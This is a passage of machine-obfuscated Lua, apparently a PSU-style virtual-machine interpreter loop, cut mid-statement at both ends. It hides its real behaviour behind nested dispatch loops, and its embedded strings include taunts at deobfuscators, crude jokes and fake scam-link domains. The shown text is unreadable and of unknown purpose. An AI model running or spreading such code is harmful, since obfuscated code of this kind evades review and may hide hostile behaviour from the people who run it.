l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];break end;break;end while 1193==(_l_)/((-0x3a+2568))do _l_=(12083400)while(0x112+-98)<__l_l do _l_-= _l_ local _=_[_lll]local __l,_l=_lllll(__[_](__[_+_l__l]))____l=_l+_-_ll local _l=0;for _=_,____l do _l=_l+_ll;__[_]=__l[_l];end;break end while(_l_)/((0x7a4f0/142))==3425 do __l_[_[___ll]]=__[_[_lll]];break end;break;end break;end break;end while(_l_)/(((107679+-0x6f)/72))==937 do _l_=(10482030)while((557-0x152)+-#[[You know c#? What does << operator do?]])>=__l_l do _l_-= _l_ _l_=(1673672)while(-64+0xf3)>=__l_l do _l_-= _l_ _l_=(1910688)while(259+-0x51)<__l_l do _l_-= _l_ local _l_l_;local __llll,_l___;local __l_l;local _l_;__[_[_l__]]();_l=_l+_ll;_=__l[_l];__[_[___l]]={};_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]][_[_llll]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[_l_ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[_llll]][_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[___ll]][_[__l__]];_l=_l+_ll;_=__l[_l];_l_=_[___];__l_l=__[_[_l_ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]];_l=_l+_ll;_=__l[_l];_l_=_[___l]__llll,_l___=_lllll(__[_l_](__[_l_+_l__l]))____l=_l___+_l_-_ll _l_l_=0;for _=_l_,____l do _l_l_=_l_l_+_ll;__[_]=__llll[_l_l_];end;_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_](_l_l(__,_l_+_l__l,____l))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_____[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[___ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___l]][_[____]]=_[__l__];_l=_l+_ll;_=__l[_l];_l=_[___ll];break end while(_l_)/((0xa05-1317))==1531 do local ___l;local _l_;__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__lll]][__[_[__ll_]]];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];___l=__[_[_l_l_]];if not ___l then _l=_l+_l__l;else __[_[___]]=___l;_l=_[___ll];end;break end;break;end while(_l_)/((1773-0x3a9))==2002 do _l_=(2542365)while(((-88+0x21)+-#[[PSU Protected!]])+0xf9)<__l_l do _l_-= _l_ local _=_[_l__]local __l,_l=_lllll(__[_](__[_+_l__l]))____l=_l+_-_ll local _l=0;for _=_,____l do _l=_l+_ll;__[_]=__l[_l];end;break end while(_l_)/((0xde9+-102))==735 do local _=_[_ll_]__[_]=__[_](__[_+_l__l])break end;break;end break;end while(_l_)/((0x84c78/(36120/0xd2)))==3315 do _l_=(12671763)while __l_l<=(444-0x105)do _l_-= _l_ _l_=(8081370)while __l_l>(0x29f2/(0xa1-102))do _l_-= _l_ local __ll_;local _l_l_,_l___;local __l_l;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];__[_[_lll]]={};_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][_[_l_ll]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[___];__l_l=__[_[__ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[__lll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[___ll]][_[___l_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[___l]_l_l_,_l___=_lllll(__[_l_](__[_l_+_l__l]))____l=_l___+_l_-_ll __ll_=0;for _=_l_,____l do __ll_=__ll_+_ll;__[_]=_l_l_[__ll_];end;_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](_l_l(__,_l_+_l__l,____l))_l=_l+_ll;_=__l[_l];if(__[_[___l]]==_[_ll__])then _l=_l+_l__l;else _l=_[___ll];end;break end while(_l_)/(((0x9a489/211)+-#[[1 plus 1 doesnt equal 111]]))==2721 do local __l=_[_ll_l];local ___=_[__ll_];local _l_=__l+2 local __l={__[__l](__[__l+1],__[_l_])};for _=1,___ do __[_l_+_]=__l[_];end;local __l=__l[1]if __l then __[_l_]=__l _l=_[____];else _l=_l+_ll;end;break end;break;end while(_l_)/((0x1f16-(0x1fc1-4110)))==3217 do _l_=(1586334)while(-#'You have deobuscated the code well done'+(514-(-#"Broo u/thatHEXdude slapped this server"+(0x11598/216))))<__l_l do _l_-= _l_ local _l_;__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=(_[___ll]~=0);break end while 2514==(_l_)/((1363-0x2dc))do local _l_;__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];if __[_[_lll]]then _l=_l+_ll;else _l=_[____];end;break end;break;end break;end break;end break;end break;end break;end while 1998==(_l_)/((-#[[You know c#? What does << operator do?]]+(1668+-0x1a)))do _l_=(5081356)while __l_l<=(-0x49+289)do _l_-= _l_ _l_=(12905553)while __l_l<=(0x35e8/69)do _l_-= _l_ _l_=(2303487)while((0x224-316)+-#[[PSU Deobfuscation Speedrun AnyPrecent WR]])>=__l_l do _l_-= _l_ _l_=(2418004)while __l_l<=(-#'steancommunityru.ru/scamlinkhere'+(41360/0xbc))do _l_-= _l_ _l_=(2180909)while((-54+0x125)+-#'Cannnn Iiiiiiiii put my ballzzzzzz in your jawwwwwww?')>=__l_l do _l_-= _l_ local _=_[___]local __l,_l=_lllll(__[_](_l_l(__,_+_ll,____l)))____l=_l+_-_l__l local _l=0;for _=_,____l do _l=_l+_ll;__[_]=__l[_l];end;break;end while(_l_)/(((0xcd5c/26)+-#'LOL ur gonna fail probs'))==1091 do _l_=(180010)while __l_l>(-#"You know c#? What does << operator do?"+(0xba54/212))do _l_-= _l_ __[_[___l]]=#__[_[__ll]];break end while(_l_)/((7702-0xf20))==47 do local _l_;__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];if __[_[_ll_]]then _l=_l+_ll;else _l=_[_l_ll];end;break end;break;end break;end while(_l_)/((5417-0xac2))==908 do _l_=(4585614)while __l_l<=(0x1b5-247)do _l_-= _l_ _l_=(2167458)while __l_l>(0x191a/34)do _l_-= _l_ for _=_[_lll],_[__ll]do __[_]=nil;end;break end while(_l_)/((0x28f+-113))==3999 do local _l_;__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[_l_ll]~=0);break end;break;end while 3417==(_l_)/((2754-0x584))do _l_=(5762796)while((543-0x14c)+-#[[brick luke deez nuts]])<__l_l do _l_-= _l_ __[_[_lll]]=_____[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=#__[_[_llll]];_l=_l+_ll;_=__l[_l];_____[_[__lll]]=__[_[___]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_____[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=#__[_[_llll]];_l=_l+_ll;_=__l[_l];_____[_[__ll]]=__[_[___l]];_l=_l+_ll;_=__l[_l];do return end;break end while 3604==(_l_)/((179088/0x70))do local _l_;__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___]][__[_[__ll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[____]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[__ll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[____]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[__ll]]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[_llll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[_l_ll]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];break end;break;end break;end break;end while 633==(_l_)/((-29+((441133/0x77)+-#[[You have deobuscated the code well done]])))do _l_=(979755)while(509-0x139)>=__l_l do _l_-= _l_ _l_=(3058278)while((44850/0xc3)+-#"did you solve the lua challenge yet?")>=__l_l do _l_-= _l_ _l_=(2228505)while((319+-0x4b)+-#"You know lua? name every metamethod - skids of v3rm")<__l_l do _l_-= _l_ local _l=_[_l__]__[_l](_l_l(__,_l+_l__l,_[____]))break end while 1363==(_l_)/((3341-0x6aa))do local ___;local _l_;__[_[___l]]=__[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[___l];____l=_l_+_ll_ll-1;for _=_l_,____l do ___=__llll[_-_l_];__[_]=___;end;_l=_l+_ll;_=__l[_l];_l_=_[___l];do return __[_l_](_l_l(__,_l_+1,____l))end;_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];do return _l_l(__,_l_,____l)end;_l=_l+_ll;_=__l[_l];do return end;break end;break;end while 3667==(_l_)/((0x2dd02/((535-0x118)+-#'heres a hint: repeat until nil')))do _l_=(7601320)while __l_l>(-#'localplayer not working on server scripts pls help'+(3430/0xe))do _l_-= _l_ local _ll_l;local _l_;_l_=_[_l__]__[_l_](_l_l(__,_l_+_l__l,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll];_ll_l=__[_[__lll]];__[_l_+1]=_ll_l;__[_l_]=_ll_l[__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[__lll]~=0);break end while(_l_)/((-0x37+3125))==2476 do local __l=_[___l]local _l_={__[__l](_l_l(__,__l+1,____l))};local _l=0;for _=__l,_[_l_l_]do _l=_l+_ll;__[_]=_l_[_l];end break end;break;end break;end while(_l_)/((0x257-354))==3999 do _l_=(2938110)while __l_l<=((-0x14+240)+-#'certified hood classif')do _l_-= _l_ _l_=(10188023)while((0xbb44/235)+-#[[sup v 2]])<__l_l do _l_-= _l_ local _l=_[_l__];local _ll=__[_[__ll]];__[_l+1]=_ll;__[_l]=_ll[_[__ll_]];break end while(_l_)/((-124+0xcd7))==3221 do local _l_;__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]][_[_l_ll]]=__[_[_lll_]];break end;break;end while(_l_)/((3607-0x71e))==1646 do _l_=(2304188)while __l_l>(-0x35+252)do _l_-= _l_ local ___;local _l_;_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l];___=__[_[__ll]];__[_l_+1]=___;__[_l_]=___[__[_[_lll_]]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[_llll]~=0);break end while 1451==(_l_)/(((0x63fb6/247)+-#[[I am albanian obfuscator I cannot hide this script please dont view it]]))do if __[_[_lll]]then _l=_l+_ll;else _l=_[_l_ll];end;break end;break;end break;end break;end break;end while(_l_)/((0x1bab-3554))==3657 do _l_=(4910655)while __l_l<=(0x20d-317)do _l_-= _l_ _l_=(7147412)while __l_l<=(-#[[v3 has it]]+(0x4a0d/89))do _l_-= _l_ _l_=(2569536)while __l_l<=(467-0x109)do _l_-= _l_ _l_=(3374970)while __l_l>(-0x4e+279)do _l_-= _l_ __[_[___]]=__[_[____]]*__[_[___l_]];break end while(_l_)/(((-0x4c+1234)+-#"mom shot dad"))==2945 do __[_[_ll_]]=__l_[_[_llll]];break end;break;end while 2974==(_l_)/(((-0x70+1002)+-#[[starmcommunity.ru/scamlink]]))do _l_=(864300)while((0x23c-323)+-#[[This is my kingdom cum, this is my kingdom cum]])<__l_l do _l_-= _l_ local _l_;__[_[_l__]][__[_[_llll]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[__lll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[___ll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[_llll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[_llll]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[___ll]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[_llll]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[_l_ll]]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[_l_ll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[__ll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]][__[_[_llll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[__lll]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];break end while(_l_)/((-#[[Oh so you constant dumped the script? Ladies and gentleman we got genius there]]+(0x2a6-385)))==4020 do local 